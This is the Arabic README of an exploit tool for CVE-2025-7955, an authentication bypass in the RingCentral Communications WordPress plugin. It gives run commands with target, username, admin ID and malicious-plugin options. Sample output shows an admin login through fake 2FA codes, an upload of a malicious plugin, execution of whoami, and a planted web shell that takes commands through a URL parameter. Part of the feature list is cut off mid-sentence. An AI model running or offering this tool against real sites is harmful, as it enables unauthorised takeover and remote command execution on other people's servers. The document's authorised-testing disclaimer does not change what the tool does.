
RingCentral Communications 1.5 - 1.6.8 - عدم وجود تحقق من جانب الخادم يؤدي إلى تجاوز المصادقة عبر دالة ringcentral_admin_login_2fa_verify
RingCentral Communications 1.5 - 1.6.8 - فقدان التحقق من جانب الخادم يؤدي إلى تجاوز المصادقة عبر دالة ringcentral_admin_login_2fa_verify
CVE: CVE-2025-7955
الملحق المتأثر: RingCentral Communications (ووردبريس)
الإصدارات المتأثرة: 1.5 – 1.6.8
درجة CVSS: 9.8 (حرجة)
النوع: تجاوز المصادقة (فقدان التحقق من جانب الخادم)
الملحق RingCentral Communications لووردبريس معرض لتجاوز المصادقة بسبب التحقق غير السليم داخل الدالة
ringcentral_admin_login_2fa_verify(). الإصدارات 1.5 إلى 1.6.8 تسمح للمهاجمين غير المصادق عليهم بتسجيل الدخول كأي مستخدم بمجرد تقديم أكواد مكررة وهمية.
هذا الاستغلال يؤتمت سلسلة الهجوم الكاملة لـ CVE-2025-7955. وهو مصمم لـ:
/wp-json/wp/v2/users/ID).whoami عبر القشرة ويطبع المخرجات.جهز ملحقك الخبيث
تأكد من وجود ملف ZIP للملحق الخبيث (افتراضياً: Nxploit.zip) في نفس مجلد السكربت.
شغل الاستغلال:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (مطلوب) رابط موقع ووردبريس المستهدف-user, --username : (اختياري) اسم المستخدم لتسجيل الدخول به (يُكتشف تلقائياً إذا حُذف)-id, --id_admin : (افتراضي: 1) معرف المستخدم (المدير عادةً ID 1)-z, --zip : (افتراضي: Nxploit.zip) مسار ملف ZIP للملحق الخبيثمثال:
python3 CVE-2025-7955.py -u http://target/wordpress
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 استغلال بواسطة: Nxploited
[*] استخدام عامل المستخدم: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] محاولة تسجيل الدخول كـ: admin (المعرف: 1)
[+] تم تسجيل الدخول بنجاح!
[+] Nonce: 661e57f2e4
[*] جاري رفع الملحق الخبيث...
[+] تم رفع الملحق بنجاح!
[*] تنفيذ: whoami
----------------------------------------
daemon
----------------------------------------
[+] القشرة: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
هذه الأداة للاستخدام المصرح به في اختبار الأمان وللأغراض التعليمية فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
المؤلف لا يتحمل أي مسؤولية عن أي إساءة استخدام أو أضرار ناتجة عن هذا السكربت.
بواسطة: Khaled Alenazi (Nxploited)
أو مع تحديد اسم المستخدم/المعرف:
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1